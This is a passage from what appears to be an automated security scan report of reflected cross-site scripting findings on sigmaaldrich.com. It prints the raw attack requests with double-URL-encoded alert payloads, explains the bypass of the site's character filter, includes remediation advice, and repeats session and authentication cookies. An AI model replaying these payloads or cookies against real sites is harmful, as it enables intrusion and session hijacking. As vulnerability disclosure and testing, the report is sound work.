Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:58 GMT
Content-Length: 29001
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/analytical-chromatography36c27";alert(1)//7975ddc7b5f/fluka-analytical/customware-oem","E404") ;
   </script>
...[SNIP]...

1.86. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae422%2522%253balert%25281%2529%252f%252fbd23f0de004 was submitted in the REST URL parameter 5. This input was echoed as ae422";alert(1)//bd23f0de004 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analyticalae422%2522%253balert%25281%2529%252f%252fbd23f0de004/customware-oem HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:01 GMT
Content-Length: 29001
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analyticalae422";alert(1)//bd23f0de004/customware-oem","E404") ;
   </script>
...[SNIP]...

1.87. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12939%2522%253balert%25281%2529%252f%252f16e13dff68c was submitted in the REST URL parameter 6. This input was echoed as 12939";alert(1)//16e13dff68c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem12939%2522%253balert%25281%2529%252f%252f16e13dff68c HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:02 GMT
Content-Length: 29001
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem12939";alert(1)//16e13dff68c","E404") ;
   </script>
...[SNIP]...

1.88. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54859%2522%253balert%25281%2529%252f%252ff7b186b0cc9 was submitted in the REST URL parameter 1. This input was echoed as 54859";alert(1)//f7b186b0cc9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content54859%2522%253balert%25281%2529%252f%252ff7b186b0cc9/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:03 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content54859";alert(1)//f7b186b0cc9/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog","E404") ;
   </script>
...[SNIP]...

1.89. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b749e%2522%253balert%25281%2529%252f%252f222bd087545 was submitted in the REST URL parameter 2. This input was echoed as b749e";alert(1)//222bd087545 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrichb749e%2522%253balert%25281%2529%252f%252f222bd087545/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:06 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichb749e";alert(1)//222bd087545/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog","E404") ;
   </script>
...[SNIP]...

1.90. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79af7%2522%253balert%25281%2529%252f%252f5a3e73ff3ff was submitted in the REST URL parameter 3. This input was echoed as 79af7";alert(1)//5a3e73ff3ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest79af7%2522%253balert%25281%2529%252f%252f5a3e73ff3ff/chemistry/chemical-synthesis/chemical-synthesis-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
